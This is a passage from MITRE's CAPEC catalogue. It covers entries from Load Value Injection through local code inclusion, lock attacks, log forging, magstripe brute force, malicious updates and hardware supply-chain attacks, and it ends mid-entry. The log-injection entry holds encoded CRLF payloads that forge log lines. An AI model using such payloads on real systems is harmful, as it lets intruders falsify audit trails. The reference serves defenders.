When attacking a Windows machine, wait until the OS clears the PTE accessed bit. When the page is next accessed, the CPU will always issue a microcode assist for re-setting this bit

Exploit

Operate on adversary-controlled data: Once the attack has been set up and the page fault or microcode assist occurs, the system operates on the adversary-controlled data.

Techniques
Influence the system to load sensitive information into microarchitectural state which can be read by the adversary using a code gadget.
Hijack execution by jumping to second stage gadgets found in the address space. By utilizing return-oriented programming, this can chain gadgets together and allow the adversary to execute a sequence of gadgets.

Prerequisites

The adversary needs at least user execution access to a system and a maliciously crafted program/application/process with unprivileged code to misuse transient instruction set execution of the CPU.

The CPU incorrectly transiently forwards values from microarchitectural buffers after faulting or assisted loads

The adversary needs the ability to induce page faults or microcode assists on the target system.

Code gadgets exist that allow the adversary to hijack transient execution and encode secrets into the microarchitectural state.

Skills Required

[Level: High]

Detailed knowledge on how various CPU architectures and microcode perform transient execution for various low-level assembly language code instructions/operations.

[Level: High]

Detailed knowledge on compiled binaries and operating system shared libraries of instruction sequences, and layout of application and OS/Kernel address spaces for data leakage.

[Level: High]

The ability to provoke faulting or assisted loads in legitimate execution.

Indicators

File Signatures for Malicious Software capable of abusing Transient Instruction Set Execution

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data
Access Control	Bypass Protection Mechanism
Authorization	Execute Unauthorized Commands

Mitigations

Do not allow the forwarding of data resulting from a faulting or assisted instruction. Some current mitigations claim to zero out the forwarded data, but this mitigation still does not suffice.

Insert explicit “lfence” speculation barriers in software before potentially faulting or assisted loads. This halts transient execution until all previous instructions have been executed and ensures that the architecturally correct value is forwarded.

Related Weaknesses

CWE-ID	Weakness Name
1342	Information Exposure through Microarchitectural State after Transient Execution

References

[REF-735] Jo Van Bulck, Daniel Moghimi, Michael Schwarz, Moritz Lipp, Marina Minkin, Daniel Genkin, Yuval Yarom, Berk Sunar, Daniel Gruss and Frank Piessens. "LVI - Hijacking Transient Execution with Load Value Injection". <https://lviattack.eu/>. URL validated: 2022-09-23.

[REF-736] "Load Value Injection". Intel. 2020-01-27. <https://www.intel.com/content/www/us/en/developer/articles/technical/software-security-guidance/technical-documentation/load-value-injection.html>. URL validated: 2022-09-23.

Content History

Submissions
Submission Date	Submitter	Organization
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)

CAPEC-251: Local Code Inclusion

Attack Pattern ID: 251

Abstraction: Standard

View customized information:

Description

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	175	Code Inclusion
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	252	PHP Local File Inclusion
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	640	Inclusion of Code in Existing Process
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	660	Root/Jailbreak Detection Evasion via Hooking

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Inject Unexpected Items

Prerequisites

The targeted application must have a bug that allows an adversary to control which code file is loaded at some juncture.

Some variants of this attack may require that old versions of some code files be present and in predictable locations.

Resources Required

The adversary needs to have enough access to the target application to control the identity of a locally included file. The attacker may also need to be able to upload arbitrary code files to the target machine, although any location for these files may be acceptable.

Consequences

Scope	Impact	Likelihood
Integrity	Execute Unauthorized Commands
Confidentiality	Read Data

Mitigations

Implementation: Avoid passing user input to filesystem or framework API. If necessary to do so, implement a specific, allowlist approach.

Related Weaknesses

CWE-ID	Weakness Name
829	Inclusion of Functionality from Untrusted Control Sphere

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1055	Process Injection

References

[REF-613] "OWASP Web Security Testing Guide". Testing for Local File Inclusion. The Open Web Application Security Project (OWASP). <https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion.html>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)	Updated References
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Attack_Motivation-Consequences, Attack_Prerequisites, Resources_Required, Solutions_and_Mitigations
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated References
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Mitigations
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated References

CAPEC-549: Local Execution of Code

Attack Pattern ID: 549

Abstraction: Meta

View customized information:

Description

An adversary installs and executes malicious code on the target system in an effort to achieve a negative technical impact. Examples include rootkits, ransomware, spyware, adware, and others.

Likelihood Of Attack

Medium

Typical Severity

High

Relationships

Nature	Type	ID	Name
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	542	Targeted Malware
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	561	Windows Admin Shares with Stolen Credentials
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	644	Use of Captured Hashes (Pass The Hash)

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Inject Unexpected Items

Prerequisites

Knowledge of the target system's vulnerabilities that can be capitalized on with malicious code.The adversary must be able to place the malicious code on the target system.

Resources Required

The means by which the adversary intends to place the malicious code on the system dictates the tools required. For example, suppose the adversary wishes to leverage social engineering and convince a legitimate user to open a malicious file attached to a seemingly legitimate email. In this case, the adversary might require a tool capable of wrapping malicious code into an innocuous filetype (e.g., PDF, .doc, etc.)

Consequences

Scope	Impact	Likelihood
Confidentiality Integrity Availability	Execute Unauthorized Commands
Confidentiality Integrity Availability	Other

Mitigations

Employ robust cybersecurity training for all employees.

Implement system antivirus software that scans all attachments before opening them.

Regularly patch all software.

Execute all suspicious files in a sandbox environment.

Example Instances

BlueBorne refers to a set of nine vulnerabilities on different platforms (Linux, Windows, Android, iOS) that offer an adversary the ability to install and execute malicious code on a system if they were close in proximity to a Bluetooth enabled device. One vulnerability affecting iOS versions 7 through 9 allowed an attacker to overflow the Low Energy Audio Protocol since commands sent over this protocol are improperly validated and gain the elevated permissions of the Bluetooth stack. These vulnerabilities were a result of poor validation and were patched shortly after their exposure in 2017, but many non-updated devices remain vulnerable.

Related Weaknesses

CWE-ID	Weakness Name
829	Inclusion of Functionality from Untrusted Control Sphere

Content History

Submissions
Submission Date	Submitter	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)
Modifications
Modification Date	Modifier	Organization
2017-05-01 (Version 2.10)	CAPEC Content Team	The MITRE Corporation
2017-05-01 (Version 2.10)	Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Methods_of_Attack, Resources_Required, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit, Typical_Severity
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Example_Instances

CAPEC-392: Lock Bumping

Attack Pattern ID: 392

Abstraction: Detailed

View customized information:

Description

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	391	Bypassing Physical Locks

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Physical Security
Mechanisms of Attack	Subvert Access Control

Related Weaknesses

References

[REF-33] Stuart McClure, Joel Scambray and George Kurtz. "Hacking Exposed: Network Security Secrets & Solutions". Chapter 9: Hacking Hardware. 6th Edition. McGraw Hill. 2009.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated @Abstraction

CAPEC-393: Lock Picking

Attack Pattern ID: 393

Abstraction: Detailed

View customized information:

Description

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	391	Bypassing Physical Locks

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Physical Security
Mechanisms of Attack	Subvert Access Control

Related Weaknesses

References

[REF-33] Stuart McClure, Joel Scambray and George Kurtz. "Hacking Exposed: Network Security Secrets & Solutions". Chapter 9: Hacking Hardware. 6th Edition. McGraw Hill. 2009.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated @Abstraction

CAPEC-93: Log Injection-Tampering-Forging

Attack Pattern ID: 93

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

High

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	268	Audit Log Manipulation
CanPrecede	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	592	Stored XSS

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Manipulate System Resources

Execution Flow

Explore

Determine Application's Log File Format: The first step is exploratory meaning the attacker observes the system. The attacker looks for action and data that are likely to be logged. The attacker may be familiar with the log format of the system.

Techniques
Determine logging utility being used by application (e.g. log4j)
Gain access to application's source code to determine log file formats.
Install or obtain access to instance of application and observe its log file format.

Exploit

Manipulate Log Files: The attacker alters the log contents either directly through manipulation or forging or indirectly through injection of specially crafted input that the target software will write to the logs. This type of attack typically follows another attack and is used to try to cover the traces of the previous attack.

Techniques

Use carriage return and/or line feed characters to start a new line in the log file, and then, add a fake entry. For example:

"%0D%0A[Thu%20Nov%2012%2011:22]:Info:%20User%20admin%20logged%20in"

may add the following forged entry into a log file:

"[Thu Nov 12 12:11:22]:Info: User admin logged in"

Different applications may require different encodings of the carriage return and line feed characters.

Insert a script into the log file such that if it is viewed using a web browser, the attacker will get a copy of the operator/administrator's cookie and will be able to gain access as that user. For example, a log file entry could contain

The script itself will be invisible to anybody viewing the logs in a web browser (unless they view the source for the page).

Prerequisites

The target host is logging the action and data of the user.

The target host insufficiently protects access to the logs or logging mechanisms.

Skills Required

[Level: Low]

This attack can be as simple as adding extra characters to the logged data (e.g. username). Adding entries is typically easier than removing entries.

[Level: Medium]

A more sophisticated attack can try to defeat the input validation mechanism.

Consequences

Scope	Impact	Likelihood
Integrity	Modify Data

Mitigations

Carefully control access to physical log files.

Do not allow tainted data to be written in the log file without prior input validation. An allowlist may be used to properly validate the data.

Use synchronization to control the flow of execution.

Use static analysis tools to identify log forging vulnerabilities.

Avoid viewing logs with tools that may interpret control characters in the file, such as command-line shells.

Example Instances

Dave Nielsen and Patrick Breitenbach PayPal Web Services (aka PHP Toolkit) 0.50, and possibly earlier versions, allows remote attackers to enter false payment entries into the log file via HTTP POST requests to ipn_success.php. See also: CVE-2006-0201

If a user submits the string "twenty-one" for val, the following entry is logged:

INFO: Failed to parse val=twenty-one

However, if an attacker submits the string

twenty-one%0a%0aINFO:+User+logged+out%3dbadguy

the following entry is logged:

INFO: Failed to parse val=twenty-one
INFO: User logged out=badguy

Clearly, attackers can use this same mechanism to insert arbitrary log entries.

Related Weaknesses

CWE-ID	Weakness Name
117	Improper Output Neutralization for Logs
75	Failure to Sanitize Special Elements into a Different Plane (Special Element Injection)
150	Improper Neutralization of Escape, Meta, or Control Sequences

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

[REF-131] J. Viega and G. McGraw. "Building Secure Software". Addison-Wesley. 2002.

[REF-550] A. Muffet. "The night the log was forged". <http://doc.novsu.ac.ru/oreilly/tcpip/puis/ch10_05.htm>.

[REF-551] "The OWASP Application Security Desk Reference". Log injection. The Open Web Application Security Project (OWASP). 2009. <https://www.owasp.org/index.php/Log_Injection>.

[REF-552] Fortify Software. "SAMATE - Software Assurance Metrics And Tool Evaluation". Test Case ID 1579. National Institute of Standards and Technology (NIST). 2006-06-22. <https://samate.nist.gov/SRD/view_testcase.php?tID=1579>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)	Updated References
2017-05-01 (Version 2.10)	CAPEC Content Team	The MITRE Corporation
2017-05-01 (Version 2.10)	Updated Related_Attack_Patterns, Related_Weaknesses
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Examples-Instances, References
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Description, Mitigations, Related_Attack_Patterns
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Related_Weaknesses
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Example_Instances, Execution_Flow, Taxonomy_Mappings

CAPEC-398: Magnetic Strip Card Brute Force Attacks

Attack Pattern ID: 398

Abstraction: Detailed

View customized information:

Description

An adversary analyzes the data on two or more magnetic strip cards and is able to generate new cards containing valid sequences that allow unauthorized access and/or impersonation of individuals.

Extended Description

Often, magnetic strip encoding methods follow a common format for a given system laid out in up to three tracks. A single card may allow access to a corporate office complex shared by multiple companies. By analyzing how the data is stored on a card, it is also possible to create valid cards via brute-force attacks.

For example, a single card can grant access to a building, a floor, and a suite number. Reading and analyzing data on multiple cards, then performing a difference analysis between data encoded on three different cards, can reveal clues as to how to generate valid cards that grant access to restricted areas of a building or suites/rooms within that building. Data stored on magstripe cards is often unencrypted, therefore comparing which data changes when two or more cards are analyzed can yield results that aid in determining the structure of the card data. A trivial example would be a common system data format on a data track which binary encodes the suite number of a building that a card will open. By creating multiple cards with differing binary encoded segments it becomes possible to enter unauthorized areas or pass through checkpoints giving the electronic ID of other persons.

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	395	Bypassing Electronic Locks and Access Controls

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Physical Security
Mechanisms of Attack	Subvert Access Control

Prerequisites

The ability to calculate a card checksum and write out a valid checksum value. Some cards are protected by a checksum calculation, therefore it is necessary to determine what algorithm is being used to calculate the checksum and to employ that algorithm to calculate and write a new valid checksum for the card being created.

Related Weaknesses

References

[REF-33] Stuart McClure, Joel Scambray and George Kurtz. "Hacking Exposed: Network Security Secrets & Solutions". Chapter 9: Hacking Hardware. 6th Edition. McGraw Hill. 2009.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated @Abstraction, Related_Attack_Patterns
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Extended_Description

CAPEC-187: Malicious Automated Software Update via Redirection

Attack Pattern ID: 187

Abstraction: Detailed

View customized information:

Description

Extended Description

One predominate type of redirection attack requires DNS spoofing or hijacking of a domain name corresponding to an update server. The target software initiates an update request and the DNS request resolves the domain name of the update server to the IP address of the attacker, at which point the software accepts updates either transmitted by or pulled from the attackers' server. Attacks against DNS mechanisms comprise an initial phase of a chain of attacks that facilitate automated update hijacking attack, and such attacks have a precedent in targeted activities that have been as complex as DNS/BIND attacks of corporate infrastructures, to untargeted attacks aimed at compromising home broadband routers, as well as attacks involving the compromise of wireless access points, as well as 'evil twin' attacks coupled with DNS redirection. Due to the plethora of options open to the attacker in forcing name resolution to arbitrary servers the Automated Update Hijacking attack strategies are the tip of the spear for many multi-stage attack chains.

The second weakness that is exploited by the attacker is the lack of integrity checking by the software in validating the update. Software which relies only upon domain name resolution to establish the identity of update code is particularly vulnerable, because this signals an absence of other security countermeasures that could be applied to invalidate the attackers' payload on basis of code identity, hashing, signing, encryption, and other integrity checking mechanisms. Redirection-based attack patterns work equally well against client-side software as well as local servers or daemons that provide software update functionality.

Likelihood Of Attack

High

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	186	Malicious Software Update

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Supply Chain
Mechanisms of Attack	Manipulate System Resources
Supply Chain Risks	Sustainment

Consequences

Scope	Impact	Likelihood
Access Control Availability Confidentiality	Execute Unauthorized Commands

Related Weaknesses

CWE-ID	Weakness Name
494	Download of Code Without Integrity Check

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1072	Software Deployment Tools

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)	Updated Activation_Zone, Architectural_Paradigms, Injection_Vector, Payload, Payload_Activation_Impact, References, Technical_Context
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Resources_Required
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated @Name, Consequences, Description, Likelihood_Of_Attack, Taxonomy_Mappings
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Extended_Description
Previous Entry Names
Change Date	Previous Entry Name
2020-12-17 (Version 3.4)	Malicious Automated Software Update

CAPEC-657: Malicious Automated Software Update via Spoofing

Attack Pattern ID: 657

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

High

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	186	Malicious Software Update
CanFollow	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	194	Fake the Source of Data

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Supply Chain
Mechanisms of Attack	Manipulate System Resources
Supply Chain Risks	Sustainment

Consequences

Scope	Impact	Likelihood
Access Control Availability Confidentiality	Execute Unauthorized Commands

Example Instances

An example of the spoofing strategy would be the eTrust Antivirus Webscan Automated Update Remote Code Execution vulnerability (CVE-2006-3976) and (CVE-2006-3977) whereby an ActiveX control could be remotely manipulated by an attacker controlled web page to download and execute the attackers' code without integrity checking.

Related Weaknesses

CWE-ID	Weakness Name
494	Download of Code Without Integrity Check

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1072	Software Deployment Tools

Content History

Submissions
Submission Date	Submitter	Organization
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)
Modifications
Modification Date	Modifier	Organization
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings

CAPEC-672: Malicious Code Implanted During Chip Programming

Attack Pattern ID: 672

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

Low

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	444	Development Alteration

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Hardware, Supply Chain
Mechanisms of Attack	Manipulate System Resources
Supply Chain Risks	Development and Production

Prerequisites

An adversary would need to have access to a foundry’s or chip maker’s development/production environment where programs for specific chips are developed, managed and uploaded into targeted chips prior to distribution or sale.

Skills Required

[Level: Medium]

An adversary needs to be skilled in microprogramming, manipulation of configuration management systems, and in the operation of tools used for the uploading of programs into chips during manufacture. Uploading can be for individual chips or performed on a large scale basis.

Consequences

Scope	Impact	Likelihood
Integrity	Alter Execution Logic

Mitigations

Utilize DMEA’s (Defense Microelectronics Activity) Trusted Foundry Program members for acquisition of microelectronic components.

Ensure that each supplier performing hardware development implements comprehensive, security-focused configuration management of microcode and microcode generating tools and software.

Require that provenance of COTS microelectronic components be known whenever procured.

Conduct detailed vendor assessment before acquiring COTS hardware.

Example Instances

Following a chip’s production process steps of test and verification and validation of chip circuitry, an adversary involved in the generation of microcode defining the chip’s function(s) inserts a malicious instruction that will become part of the chip’s program. When integrated into a system, the chip will produce an effect intended by the adversary.

Related Weaknesses

Supply Chain: CWE does not currently cover Supply Chain in the way it is presented by CAPEC. Therefore, no mapping between the two corpuses can be made at this time.

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1195.003	Supply Chain Compromise: Compromise Hardware Supply Chain

References

Content History

Submissions
Submission Date	Submitter	Organization
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)
Modifications
Modification Date	Modifier	Organization
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Related_Attack_Patterns, Taxonomy_Mappings

CAPEC-535: Malicious Gray Market Hardware

Attack Pattern ID: 535

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

Low

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	531	Hardware Component Substitution

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Hardware, Supply Chain, Physical Security
Mechanisms of Attack	Manipulate System Resources
Supply Chain Risks	Sustainment

Prerequisites

Physical access to a gray market reseller's hardware components supply, or the ability to appear as a gray market reseller to the victim's buyer.

Skills Required

[Level: High]

Able to develop and manufacture malicious hardware components that perform the same functions and processes as their non-malicious counterparts.

Mitigations

Purchase only from authorized resellers.

Validate serial numbers from multiple sources

Example Instances

An attacker develops co-processor boards with malicious capabilities that are technically the same as a manufacturer's expensive upgrade to their flagship system. The victim has installed the manufacturer's base system without the expensive upgrade. The attacker contacts the victim and states they have the co-processor boards at a drastically-reduced price, falsely stating they were acquired from a bankruptcy liquidation of a company that had purchased them from the manufacturer. The victim after hearing the drastically reduced price decides to take advantage of the situation and purchases the upgrades from the attacker, and installs them. This allows the attacker to further compromise the victim.

Related Weaknesses

Supply Chain: CWE does not currently cover Supply Chain in the way it is presented by CAPEC. Therefore, no mapping between the two corpuses can be made at this time.

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)	Updated Examples-Instances, Related_Attack_Patterns, Typical_Likelihood_of_Exploit
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Mitigations

CAPEC-522: Malicious Hardware Component Replacement

Attack Pattern ID: 522

Abstraction: Standard

View customized information:

Description

Likelihood Of Attack

Low

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	439	Manipulation During Distribution

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Hardware, Supply Chain
Mechanisms of Attack	Manipulate System Resources
Supply Chain Risks	Distribution

Execution Flow

Explore

Determine Target Hardware: The adversary must first identify a system that they wish to target, and a specific hardware component that they can swap out with a malicious replacement.

Techniques
Look for datasheets containing the system schematics that can help identify possible target hardware.
Procure a system and inspect it manually, looking for possible hardware component targets. Search for manufacturer IDs on hardware chips or FCC IDs on wireless chips to determine their functionality.

Discover Vulnerability in Supply Chain: The adversary maps out the supply chain for the targeted system. They look for ooportunities to gain physical access to the system after it has left the manufacturer, but before it is deployed to the victim.
Techniques
Procure a system and observe the steps it takes in the shipment process.
Identify possible warehouses that systems are stored after manufacturing.

Experiment

Test a Malicious Component Replacement: Before performing the attack in the wild, an adversary will test the attack on a system they have procured to ensure that the desired outcome will be achieved.

Techniques
Design a malicious hardware component that will perform the same functionality as the target component, but also contains additional functionality.
Obtain already designed malicious components that just need to be placed into the system.

Exploit

